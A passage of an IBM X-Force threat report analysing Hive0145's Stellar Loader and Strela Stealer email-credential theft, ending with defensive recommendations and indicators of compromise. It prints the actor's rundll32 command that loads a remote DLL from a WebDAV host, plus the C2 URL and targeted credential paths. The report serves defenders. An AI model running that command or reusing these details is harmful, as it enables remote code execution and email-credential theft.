2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #003366;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">“C:\Windows\system32\rundll32.exe”</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';"> \\</span></span><span style="color: #009900;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier 
New';">94.159</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">.</span></span><span style="color: #009900;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">113.48</span></span><span style="color: gray;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">@8888</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">\davwwwroot\</span></span><span style="color: #009900;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">157161090119030</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">.dll,Entry</span></span></p> </div> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <p>The WebDAV staging servers host a large number of DLLs, with different names and hashes. They appear to have been built using a crypter X-Force identifies as “Stellar Crypter,” which has likely been in use exclusively by Hive0145 since at least May 2023. The malicious binaries identified as “Stellar Loader” contain the encrypted Strela Stealer payload.</p> <h2>Stellar Loader</h2> <p>Stellar Loader is a crypter that has been in use since at least April 2023 and is predominantly a precursor to follow on Strela Stealer payloads. Stellar samples are usually highly obfuscated and make use of techniques such as control flow obfuscation and include large amounts of junk instructions to hinder analysis and signature creation. Stellar’s payload is XOR encrypted and stored in the .data section of the Stellar loader binary. 
The encrypted payload data is preceded by the XOR key which, in recent samples, consists solely of upper and lowercase letters and can be thousands of characters long.</p> <p>Upon execution, Stellar Loader decrypts the payload data using XOR and the stored key. The decryption process may also involve an additional round of XOR using a hardcoded single-byte key. As part of the Stellar Loader code’s obfuscation, the decryption algorithm within the code is often expanded to include hundreds of operations. However, the vast majority of these operations cancel each other out, and what appears as a complex algorithm can be reduced down to a simple XOR operation. The screenshot below shows a version of Stellar Loader with minimal obfuscation, where the structure of the loader code and decryption algorithm can be easily seen.</p> <p><amp-img src="https://images4.cmp.optimizely.com/Zz0zZDg2NjY1MGEwN2IxMWVmYWUxOTJhOGIzMTc4OTEwMw==" layout="intrinsic" class="" alt="fig 8-241105-stellar-loader-code.PNG" width="675" height="632" lightbox="lightbox"></amp-img></p> <p>In more recent versions of the loader, the encrypted payload data is followed by an additional encrypted block containing a list of API names required by the loader code, such as VirtualAlloc. The loader decrypts this block using the same key as the payload but without the additional single-byte XOR. The loader can then use the API names in the block to retrieve the corresponding API addresses.</p> <p><amp-img src="https://images1.cmp.optimizely.com/Zz02YTFlOTUwY2EwN2IxMWVmYmRiNDI2ZmFmZTE3ZDc1MA==" layout="intrinsic" class="" alt="fig 9-241105-stellar-decrypted-apis.PNG" width="593" height="128" lightbox="lightbox"></amp-img></p> <p>Once the payload and API list have been decrypted, Stellar allocates space in memory using VirtualAlloc and maps the payload PE at the allocated address. 
It then performs the standard PE loading steps, such as loading its imports and processing any relocation sections (.relocs), and finally, it executes the payload at its entry point address.</p> <h2>Strela Stealer</h2> <p>Strela Stealer changed little in functionality over the past two years. Starting with the initial version reported on by <a href="https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc" target="_blank" rel="noopener nofollow" >DCSO</a> in late 2022, the main objective of the stealer is to exfiltrate email credentials from two common email clients: Microsoft Outlook and Thunderbird. This is consistent across all variants, however, the latest variant does support more registry keys to search for Microsoft Outlook credentials than prior versions.</p> <p>Strela Stealer runs two functions tasked with stealing credentials from two email clients:</p> <table class="ScrollTableNormal" style="width: 1067px; border-collapse: collapse; border: none;" border="1" cellspacing="0" cellpadding="0"> <thead> <tr> <td style="width: 55.4453px; border: 1pt solid #dddddd; background: #f0f0f0; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Email client</span></b></p> </td> <td style="width: 301.875px; border-top: 1pt solid #dddddd; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-image: initial; border-left: none; background: #f0f0f0; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Thunderbird</span></b></p> </td> <td style="width: 693.43px; border-top: 1pt solid #dddddd; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-image: initial; border-left: none; background: #f0f0f0; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p 
style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Microsoft Outlook</span></b></p> </td> </tr> </thead> <tbody> <tr> <td style="width: 55.4453px; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-left: 1pt solid #dddddd; border-image: initial; border-top: none; background: #f4f5f7; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;">Location</span></p> </td> <td style="width: 301.875px; border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">File system</p> </td> <td style="width: 693.43px; border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Registry</p> </td> </tr> <tr> <td style="width: 55.4453px; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-left: 1pt solid #dddddd; border-image: initial; border-top: none; background: #f4f5f7; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;">Path</span></p> </td> <td style="width: 301.875px; border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #292929;">%APPDATA%\Thunderbird\Profiles\</span>logins.json</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; 
font-family: Calibri, sans-serif;"><span style="color: #292929;">%APPDATA%\Thunderbird\Profiles\</span>key4.db</p> </td> <td style="width: 693.43px; border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676</p> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <p>For Outlook, Strela Stealer specifically looks for the registry values:</p> <ul type="disc"> <li>IMAP Server</li> <li>IMAP User</li> <li>IMAP Password – decrypted using <i>CryptUnprotectData()</i></li> </ul> <p>The data is formatted and prepended with the string “FF” or “OL” for Thunderbird data and Outlook data, respectively. 
Next, it is also encrypted with a static XOR key, which represents a GUID string such as:</p> <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">96be98b2-8a00-410d-87da-2482cc8b7793</span></span></p> </div> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <p>Then, Strela Stealer sends a POST request for each email client to its hardcoded C2 server:</p> <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">http:</span></span><span style="color: #008200;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">//94.159.113[.]48/server.php</span></span></p> </div> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <p>The response is decrypted via the same XOR key above. 
Strela Stealer continues to send out POST requests in 1-second intervals until a request fails or it receives back the string “KH” (2023 versions), “ANTIROK” (2024 versions) or “CHOLLIMA” (Nov. 2024 versions).</p> <p>As of October 2024, Strela Stealer also includes two more exfiltration functions. The first gathers system information on the host and writes it to a file via the command:</p> <p><amp-img src="https://images2.cmp.optimizely.com/Zz0wZmQyMDI4MGEwODcxMWVmYWNmNDY2OGUwNDMwMWU2OQ==" layout="intrinsic" class="" alt="Strela Stealer screen1.png" width="683" height="58" lightbox="lightbox"></amp-img></p> <p>The second exfiltration function uses COM objects to enumerate the list of installed applications from the “AppsFolder” (a virtual folder, displayed as “Applications”) on the victim machine.</p> <p><strong><amp-img src="https://images3.cmp.optimizely.com/Zz03NjhhNWNkNmEwN2IxMWVmOTM2ODYyNGVkMjA4MzQyMg==" layout="intrinsic" class="" alt="fig 10-image-2024-10-31_14-21-3.png" width="673" height="511" lightbox="lightbox"></amp-img></strong></p> <p>The dropped file, as well as the list of installed applications, are read and encrypted before exfiltration in the same fashion as the others. They are sent to the C2 server with identifiers “SI” and “LA” respectively.</p> <h2>Language checks</h2> <p>Strela Stealer started to implement language checks by verifying the keyboard language on the victim host. 
Versions throughout 2024 only run on hosts with one of the following keyboard languages:</p> <ul type="disc"> <li>Spanish</li> <li>German</li> <li>Catalan</li> <li>Polish</li> <li>Italian</li> <li>Basque</li> </ul> <p><strong><amp-img src="https://images2.cmp.optimizely.com/Zz1iMzU5YzM1ZWEwN2IxMWVmYWNmNDY2OGUwNDMwMWU2OQ==" layout="intrinsic" class="" alt="fig 11-image-2024-10-31_12-58-20.png" width="513" height="303" lightbox="lightbox"></amp-img></strong></p> <p>In early November, Hive0145 started distributing stolen Ukrainian emails as well and modified the language verification logic slightly, adding Ukrainian (0x422) to the list of keyboard layouts. In addition, the developers switched to using the <i>GetKeyboardLayoutList</i> API to cover all installed keyboard layouts. If none of the languages match, Strela Stealer has a secondary check comparing the result of the user’s default locale from <i>GetLocaleInfoA </i>against “AU” and “UA”, which are the codes for Australia and Ukraine. It is possible that the developer was not sure of the endianness of the returned value and did not intend to target Australia. Overall, these changes increase the scope of machines available for a Strela Stealer infection.</p> <p><strong><amp-img src="https://images3.cmp.optimizely.com/Zz1iZWQ1MTFmMmEwN2IxMWVmOTI4NWU2NTBmNjQyY2Y2Ng==" layout="intrinsic" class="" alt="fig 12-image (9).png" width="667" height="91" lightbox="lightbox"></amp-img></strong></p> <p>Previously the malware would display an unobtrusive error message to the user after running in order to not raise any suspicion. It states that the file was corrupted and not able to be opened, in the language depending on the installed keyboard. 
The latest versions use the more universal error message “Err 100”, which is shown after 5 seconds from the beginning of execution.</p> <h2>.NET variant</h2> <p>In June 2023, X-Force observed a single Italy-targeted Hive0145 campaign delivering a new Strela Stealer variant that was completely rewritten in <strong>.NET</strong>. Similar to campaigns before it also made use of valid code signing certificates. Re-implementing malware in a different language shows a significant effort by the threat actor. In order to conceal strings, function names and control flow, the developers made use of the commercial “Aldaray Rummage Obfuscator” for <strong>.NET</strong>. The screenshot below shows the code used to access and unprotect IMAP credentials from Microsoft Outlook registry keys.</p> <p><strong><amp-img src="https://images3.cmp.optimizely.com/Zz1lMjkyOWY2MGEwN2IxMWVmOTM2ODYyNGVkMjA4MzQyMg==" layout="intrinsic" class="" alt="fig 13-image-2024-11-1_10-43-23.png" width="561" height="455" lightbox="lightbox"></amp-img></strong></p> <p>Notably, the commercial obfuscator does include a watermark for the license, which was observed as:</p> <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">Rummage is licensed to Victoria Semigodova (issue J) </span></span><span style="color: #336699; font-weight: bold;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">for</span></span><span style="color: black;"><span 
style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';"> use with any product. 5687c5da50660eda</span></span></p> </div> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <p>The sample above displays the following error message in Italian:</p> <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">Il file viene arrestato e non può essere eseguito.</span></span></p> </div> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <h2>Hive0145 objectives</h2> <p>Hive0145’s focus on harvesting email credentials sets them apart from other operators of stealer or botnet malware, which are often commoditized and target a broader range of credentials and data, or facilitate follow-on payloads intended for initial access. Hive0145’s use of stolen emails for attachment hijacking is an indicator that a portion of stolen email credentials may be used to harvest legitimate emails for further distribution. Both stolen and actor-created emails used by Hive0145 predominantly feature invoices as themes, which points towards potential financial motivation. 
Hive0145 may also sell stolen emails to affiliate partners for use in further business email compromise (BEC).</p> <h2>Conclusion</h2> <p>Hive0145 is a rapidly maturing cyber criminal threat actor that seeks to infect victims with the intention of obtaining valid email credentials. Observations suggest that the theft of email credentials through initial campaigns led to the further theft of legitimate emails, which were then reused in subsequent attachment hijacking campaigns. Strela Stealer continues to be an effective tool for Hive0145 to extract email credentials.</p> <p>The wide variety of industries impersonated by Hive0145’s email campaigns increases the potential risk of being targeted for commercial organizations throughout Europe. Of note, organizations in Italian-, Spanish-, German- or Ukrainian-speaking regions may be at more immediate risk of a Hive0145 campaign. X-Force recommends heightened vigilance towards received email attachments and careful verification that the delivered file type matches what was expected.</p> <h2>Recommendations</h2> <p>X-Force recommends organizations:</p> <ul type="disc"> <li>Exercise caution with unsolicited emails and ZIP archive attachments, particularly invoice-themed ones</li> <li>Consider changing the default application for JavaScript/JScript/VBScript files to Notepad, so that a double-clicked script is opened for viewing rather than executed</li> <li>Monitor for rundll32.exe processes loading DLLs from remote rather than local paths</li> <li>Install and configure endpoint security software</li> <li>Update relevant network security monitoring rules, including blocking the C2 indicators listed below</li> <li>Educate staff on the potential threats to the organization</li> </ul> <table class="ScrollTableNormal" style="border-collapse: collapse; border: none;" border="1" cellspacing="0" cellpadding="0"> <thead> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator</span></b></p> </td> <td style="width: 67.7pt; border: solid 
#DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator Type</span></b></p> </td> <td style="width: 201.55pt; border: solid #DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Context</span></b></p> </td> </tr> </thead> <tbody> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">03853c56bcfdf87d71ba4e17c4f6b55f989edb29fc1db2c82de3d50be99d7311</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader (Oct 2024)</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">e50bea80513116a1988822fe02538d3af4d91505d4098afca4ea741bcf4cd427</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 
1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader (May 2024)</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">2cac42735170cd3f67111807a7e48f8fca104eb97c379129872249160d90e22d</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader – minimal obfuscation (Jan 2024)</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">9a032497b82c3db8146cb624b369f63bef76b302a5e25349156bdcb53af3fb84</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; 
font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer payload</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">e4a7ad38aaea4bd27c32c57b5a52eac1020495cf8698a2b595b169a3c5c9313a</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer payload</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">2f7ac330e100b577748bb34bd8f7f655f6d138b90683594dbf06ccc41bb3751a</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: 
solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader (Nov 2024)</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">94.159.113[.]48</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer C2</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #161616;">94.159.113[.]86</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, 
sans-serif;">Strela Stealer C2</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #161616;">193.109.85[.]231</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer C2</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">5906c8e683b8eb9d2bc104f3ca7abaa1f76c64ac694c46a0de5ec67456364f5d</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer .NET variant</p> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> 
href="https://www.ibm.com/legal/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US&cm_mc_uid=03001744655915532865554&cm_mc_sid_50200000=84159441565120380187" target="_blank" rel="noopener, noreferrer">Terms of use</a> <a href="https://www.ibm.com/accessibility/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" rel="noopener, noreferrer">Accessibility</a> <a href="#" onclick="truste.eu.clickListener();return false;" target="_blank" rel="noopener, noreferrer">Cookie Preferences</a> </div> <!-- Sponsor credits --> <div class="utility_bar__sponsor"> <a href="http://ibm.com/security?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" data-icon="B" class="icon ibm" rel="noopener, noreferrer" style="padding-right:0px"> <span>Sponsored by <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 31.97 14.06"> <defs> <style> .cls-1 { fill: #fff; } </style> </defs> <title>si-icon-eightbarfeature</title> <path class="cls-1" 
